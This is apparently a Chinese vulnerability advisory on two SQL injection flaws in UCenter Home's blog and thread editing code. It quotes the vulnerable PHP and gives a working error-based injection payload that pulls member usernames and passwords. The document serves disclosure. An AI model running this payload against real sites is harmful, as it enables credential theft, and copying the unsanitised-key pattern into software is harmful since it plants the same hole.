### 简要描述:
Ucenter Home最新版SQL注入两处,比较隐蔽
### 详细说明:
在编辑日志处
文件cp_blog.php:
```
//添加编辑操作
if(submitcheck('blogsubmit')) {
if(empty($blog['blogid'])) {
$blog = array();
} else {
if(!checkperm('allowblog')) {
ckspacelog();
showmessage('no_authority_to_add_log');
}
}
//验证码
if(checkperm('seccode') && !ckseccode($_POST['seccode'])) {
showmessage('incorrect_code');
}
include_once(S_ROOT.'./source/function_blog.php');
if($newblog = blog_post($_POST, $blog)) {
if(empty($blog) && $newblog['topicid']) {
$url = 'space.php?do=topic&topicid='.$newblog['topicid'].'&view=blog';
} else {
$url = 'space.php?uid='.$newblog['uid'].'&do=blog&id='.$newblog['blogid'];
}
showmessage('do_success', $url, 0);
} else {
showmessage('that_should_at_least_write_things');
}
}
```
注意这里的$newblog = blog_post($_POST, $blog)
更新内容应该是在blog_post函数,跟进。
文件function_blof.php:
```
//添加博客
function blog_post($POST, $olds=array()) {
global $_SGLOBAL, $_SC, $space;
//操作者角色切换
$isself = 1;
if(!empty($olds['uid']) && $olds['uid'] != $_SGLOBAL['supe_uid']) {
$isself = 0;
$__SGLOBAL = $_SGLOBAL;
$_SGLOBAL['supe_uid'] = $olds['uid'];
$_SGLOBAL['supe_username'] = addslashes($olds['username']);
}
......
//获取上传的图片
$uploads = array();
if(!empty($POST['picids'])) {
$picids = array_keys($POST['picids']);
print_r($picids);
$query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('pic')." WHERE picid IN (".simplode($picids).") AND uid='$_SGLOBAL[supe_uid]'");
while ($value = $_SGLOBAL['db']->fetch_array($query)) {
if(empty($titlepic) && $value['thumb']) {
$titlepic = $value['filepath'].'.thumb.jpg';
$blogarr['picflag'] = $value['remote']?2:1;
}
$uploads[$POST['picids'][$value['picid']]] = $value;
}
if(empty($titlepic) && $value) {
$titlepic = $value['filepath'];
$blogarr['picflag'] = $value['remote']?2:1;
}
}
```
在获取上传图片时,看这里的关键代码:
```
$picids = array_keys($POST['picids']);
$query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('pic')." WHERE picid IN (".simplode($picids).") AND uid='$_SGLOBAL[supe_uid]'");
```
$picids = array_keys($POST['picids']),获取了picids的数组的全部键值
然后picdis进入了SQL,这里导致了SQL注入。
第二处SQL注入
文件cp_thread.php
```
if(submitcheck('threadsubmit')) {
$tid = $_POST['tid'] = intval($_POST['tid']);
$tagid = empty($_POST['tagid'])?0:intval($_POST['tagid']);
if($eventid && $event['tagid']!=$tagid) {
showmessage('event_mtag_not_match');
}
......//省略
//获取上传的图片
$uploads = array();
if(!empty($_POST['picids'])) {
$picids = array_keys($_POST['picids']);
$query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('pic')." WHERE picid IN (".simplode($picids).") AND uid='$_SGLOBAL[supe_uid]'");
while ($value = $_SGLOBAL['db']->fetch_array($query)) {
if(empty($titlepic) && $value['thumb']) {
$titlepic = pic_get($value['filepath'], $value['thumb'], $value['remote']);
}
$uploads[$_POST['picids'][$value['picid']]] = $value;
}
if(empty($titlepic) && $value) {
$titlepic = pic_get($value['filepath'], $value['thumb'], $value['remote']);
}
}
```
通用先获取了$_POST['picids']的值,然后直接进入了SQL语句,导致SQL注入
漏洞证明同第一处SQL注入。
### 漏洞证明:
1、发表一篇日志
2、编辑日志
3、在编辑日志是,上传图片:
[<img src="https://images.seebug.org/upload/201407/251626036960fe495f3972916aa18f8cf98eb054.png" alt="666.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/251626036960fe495f3972916aa18f8cf98eb054.png)
4、然后保存是,抓包,修改POST数据:
修改picids[3]为:
```
picids[3',(select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username, 0x23, password) from uchome_member limit 0,1))a from information_schema.tables group by a)b))#]"
```
[<img src="https://images.seebug.org/upload/201407/25163540977ca97652931857ff7ba66558a39547.png" alt="777.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/25163540977ca97652931857ff7ba66558a39547.png)
最后执行的sql语句为:
```
SELECT * FROM uchome_pic WHERE picid IN ('3',(select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username, 0x23, password) from uchome_member limit 0,1))a from information_schema.tables group by a)b))#','4') AND uid='2'
```
然后看返回:
[<img src="https://images.seebug.org/upload/201407/2516355339bb38aa79954fe6c11cf552c51d9a1f.png" alt="888.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/2516355339bb38aa79954fe6c11cf552c51d9a1f.png)
[<img src="https://images.seebug.org/upload/201407/2516372696e622bb8284032a4c11f031b14fcc4e.png" alt="888-1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/2516372696e622bb8284032a4c11f031b14fcc4e.png)
京公网安备 11010502034610号
暂无评论